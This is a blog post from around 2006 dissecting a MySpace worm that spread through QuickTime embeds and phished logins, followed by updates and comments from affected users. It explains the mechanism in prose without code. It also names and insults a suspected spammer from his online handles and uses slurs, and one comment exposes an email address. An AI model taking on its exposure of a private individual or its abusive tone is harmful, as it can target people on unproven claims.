MySpace Worm: Phishing Accounts and Spreading Zango Porn

Yesterday, a metric ton of MySpace accounts were infected with yet another worm. As I predicted ten days ago, it was accomplished via a QuickTime embed. Visiting the profile of anyone infected would cause the navigation links across the top of your profile (Home | Browse | Search | Invite | etc…) to be replaced by fake navigation links which all linked to a spoof MySpace login page via some basic CSS and HTML added to your “About Me” section. And, the QuickTime embed was added to one of your “Interests” sections to further propagate this worm / phishing attack. At a glance, this looked like nothing more than that: a worm being used to phish MySpace passwords.

I downloaded the .mov (QuickTime File) and opened it up in a text editor to see what it was triggering to cause this mess. It was plainly clear that the JavaScript it was executing; from the same domain as the spoof login page, was intended to do more than just inject some code to phish people and spread the worm. It also had code in there to send internal MySpace messages to random people with MySpace friend IDs between 105000000 and 80000000. This attempt fell flat, but the intent was there nonetheless. Why did it fail? Either poor coding or MySpace’s spam filter. This ill-fated spam attempt revealed the identity of the guy behind the worm… Well, it made it so that he won’t be all that hard to track down anyway.

The intended MySpace message spam would have randomly used one of the following subject lines:

what else is there to do on a Sunday.?…….
You better not forget about this..
Hehe that was so funny..
better see this one last time lol..
omg did you see this last nite..
whos coming to the party tonight.?..

And, the body of the message would have contained a fake YouTube video (pictured below) linked to a site that’s…. Pushing Zango installs (nasty adware).

*The web addresses listed in the below paragraph contain adult content*
The url that Fake YouTube video would have been linked to is what gave this douche-bag up: http://google.com/url?q=http://www.vidchicks.com/home.php. That “home.php” simply redirects you to the same url you’d get as a pop-under if you visited any page on Vidchicks.com: http://www.vidchicks.com/popunder.html. And, that popunder.html is simply a landing page being used to get people to install some adware courtesy of Zango. I was able to dig up all kinds of dirt on the webmaster of Vidchicks.com. I’ll get to that in a second.

On the landing page he’s pushing the Zango installs from, he has visitor tracking being logged by the public version of Extremetracking.com. If you’re reading this before they pull his account, those stats can be found here. The visitor stats found there are pretty telling. He has been spamming the hell out of MySpace from those phished accounts via messages, comments, and bulletins.

The below shows unique visits:

Visiting a few of the MySpace profiles he has gotten visitors from recently showed that he has been posting various images as comments from phished accounts to get people to visit that Zango landing page of his. Sometimes he simply posts the same fake YouTube video as above. Other times, he’ll post stuff like the below:

So, he’s basically just scumming it up in any way that he can. After doing a bit of research on this guy I found that this is his typical behavior.

Here’s a taste of the pile of dirt I found on this guy:

1. He goes by a number of different names on webmaster forums because he has a knack for doing shady stuff. If you’re doing business with a guy that goes by the name eLogic or Creepah, I highly suggest that you stop. Those are two of his handles for sure. The eLogic name is used on some forums where he does traffic trades and whatnot. And, he tried to sell Vidchicks.com on DNForum a few weeks back under the name Creepah. Oh yeah, Vidchicks.com is registered under the fake business name of eLogic Inc.

2. He was banned from a webmaster forum for creating a fake account to bid on one of his own auctions to drive the price of a site up. *No url included because it’s a private forum

Here’s a screenshot from his Digg.com account:
14 stories Dugg and 20 submitted. *Holds up a Yes, this guy is retarded sign*

5. Who cares? I think all of the above establishes this guy as a typical spammer.

In conclusion:
– MySpace killed off that worm yesterday by adding the domains he was using to their spam filter’s list and getting the hosts to pull those files. This is just a temp fix though. They’ll need to ban QuickTime files if they want to prevent this kind of stuff from happening on a daily basis.

– The guy behind this is obviously in blatant violation of numerous laws. If any law enforcement or other government agency wants to take action against this idiot: it’ll be real easy to nail him down. On all the webmaster forums, he has remained consistent in saying that he’s from the UK. This isn’t necessarily true, but a subpoena served on any of his income sources (Zango, Adult AdWorld, etc) would turn up a address for sure. ;-)

– I’ve got the flu and didn’t sleep last night, so excuse any typos and/or other retardedness in the above.

Update (12/01/06):

“MySpace killed off that worm yesterday by adding the domains he was using to their spam filter’s list and getting the hosts to pull those files. This is just a temp fix though. They’ll need to ban QuickTime files if they want to prevent this kind of stuff from happening on a daily basis.”

Well, MySpace has apparently decided to try to handle this issue differently. And, the same worm is spreading around today using different domains to host the QuickTime file, Spoof Login page, and JavaScript. I guesstimate that at least 1/10th of all active users were infected by this thing over the past few days. And, there is no telling how many accounts have been phished. Yesterday, MySpace Tom posted the below:

I think that makes it pretty safe to say that the MySpace crew has come to the same conclusion as me: a metric TON of people have already been phished via this worm setup. I smell a lot of spam in the near future.

Yesterday, I didn’t mention a part of this guy’s hustle that is pretty interesting. He is hosting the files being used for this worm on domains he has compromised. I imagine he is doing this in order to have a little room for denial. “Dude, I don’t know what you guys are talking about. Someone else is spamming the hell out of that place with the url to my Zango page.” Yeah, sure.

As of right now:
He cleaned up his JavaScript a bit and it now randomly inserts the QuickTime file from one of two domains. Yesterday he was using two domains also, but they were both standalone operations doing the exact same thing. So, he has the QuickTime file, JavaScript, and spoof login page sitting on two separate domains – working together now. His phishing efforts have been cut short though. Both of the Spoof Login pages are set to post the inserted data over to a third domain (a .edu) which is already down. And, the webmaster at one of the domains added some text to the spoof login on his domain warning people that it’s a fake:

I’m not sure if he has this same double-whammy setup on any other domains right now though. If not, I’m sure he will soon enough. I’ll say it again: this is not going away until MySpace bans QuickTime embeds.

Besides this story getting all that exposure, it has taken a few turns since my last update. And, I have a small correction to make about something I said…

“MySpace killed off that worm yesterday by adding the domains he was using to their spam filter’s list and getting the hosts to pull those files.”
Yeah, I was wrong about that. The servers the files were on simply couldn’t handle all the traffic. A day later they quit 404ing. And, one of the four domains is still hosting the files.

I was also wrong in saying “[MySpace]’ll need to ban QuickTime files if they want to prevent this kind of stuff from happening on a daily basis”. They contacted Apple asking for a patch and Apple has provided a temp one that helps out Internet Explorer users, with a permanent solution on the way. I find this a bit odd since this worm setup simply used a QuickTime feature, not a QuickTime flaw. It was a shortsighted, security flawed in nature, and downright retarded feature… But, a “feature” nonetheless.

This has stirred up a bit of debate on who is to blame, Myspace or Apple. Personally, I think they both screwed up on this one. Apple for thinking that launching JavaScript from streaming media was a bright idea. MySpace for not having a security team in place that keeps up with industry news to avoid stuff like this. And, for doing a piss poor job of letting their users know what was going on. And, for not providing a temporary fix before they got that temp fix from Apple – banning QuickTime embeds for a few days would have saved tens of thousands of people from being phished. And, and, and… Well, you get the point.

MySpace Tom posted the below yesterday:

It linked to a page which has the temp QuickTime patch Apple provided. After clicking the install button several times, I’m still not sure if the damn thing installed. All of this is of course causing a ton of confusion amongst the MySpace crowd. So much so that MySpace Tom posted a blog about it (the blog entry has been deleted, hmm). The very first line of which is factually incorrect and sure to piss off the guys at Apple:

“the security problems this weekend were related to a hole in activex quicktime installer.”

Dude, are you high??? That’s completely retarded sounding and not true. Plus, it sure looks like you’re trying to place all the blame on Apple. Not a very slick move considering you’re waiting for a permanent fix from them.

He goes on to explain that the download is legit, the post about it was really by him, etc. Pretty sad when a site’s user base is so accustomed to deception, scams, worms, and other nastiness that they don’t even know if a update by the poster boy of the site is real.

Comment navigation

I’m having the same problem as others…my add comments link just suddenly disappeared last night, no clue why! I found code on the net to get it back and it’s back, only it’s in the wrong section (the web page where I got the code said to copy and paste the code at the end of the Who I’d Like to Meet Section and I did, so that’s where it is showing up, not in the Comments Section where it should be)!

HELP!!! At least my friends can leave my comments now, but I would like it back where it belongs! Plus, I’m worry that my account will start to get all screwed up from being phished! I would appreciate any assistance!

My myspace has been acting up. I mean I cant even sign into it because I guess I resigned in accidentally because I thought it was myspace but it was really a site called freeweb? So now everybody has been telling me that there is a invisible code on all my links on my site. I have no idea how to fix it and I’ve already emailed myspace about it and still no reply. I need major help!

I recently logged into my accounrt and all of my friends have disappeared?? I do not not if this is an act of phishing, or getting a worm?? I need your help, please if there is any information help me!!!

Hello, I dont dnow why my myspace is so strange… whenever I want to edit my profile it wont let me, or people dont recieve my messages or comments, they also cant see my friend requests. All of the sudden, it wont let me post pictures in my comments either. And sometimes, my profile will go back to its original plain “mode”.

every time i try to log in to myspace a big purple mouse called steven runs across the screen singing “o when the saints”
does anyone know what i can do its getting quite annoying email me at iloverimming69style@yahoo.co.uk thanks
joe

As of four days ago, I couldn’t login to the MS account. I can still see it from a “band” account, so it isn’t TOS deletion. Of course, eventually it asked me to enter the captcha codes, still no go and then lockout for too many attempts. I have a feeling that tech support is all bots. No response. Worse, the account in question is linked to an old, dead email address. (I know, I know). Anybody else having these “sit tight” problems? The MySpace Help profile listed login issues for two straight days but they are no longer listed. Thanks all.

I have been trying to contact myspace regarding my account. I made the attempt to change my email address this past sunday and thought I was successful. Received the email from them with the confirmation code etc… well… now I can’t even get into the account with either email address, and when I go to see if maybe I the password was changed or somthing… It says that both email addresses are not valid. I have emailed them several times and don’t know what to do . Could you help me and let me know how I can get this resolved or even get the stupid thing deleted and start over. Just send me an email~!! TIA!!

YOOO!! i wuz on my myspace last night nd it sayz i got phished nd i havta change my password but everytime i try it says passwords dont match… BUT THEY DO!!! ive done it lik a million times ive tried changin my email nd eveything but still it wont work. wut should i do???

ok, i got phished today.
i changed my password but it wont work.
my safe mode is hidden now. i cant get to it.
its not possible to go to edit profile bc of the spammer so there is nothing i can do! same thing happened to my brother can anyone please help!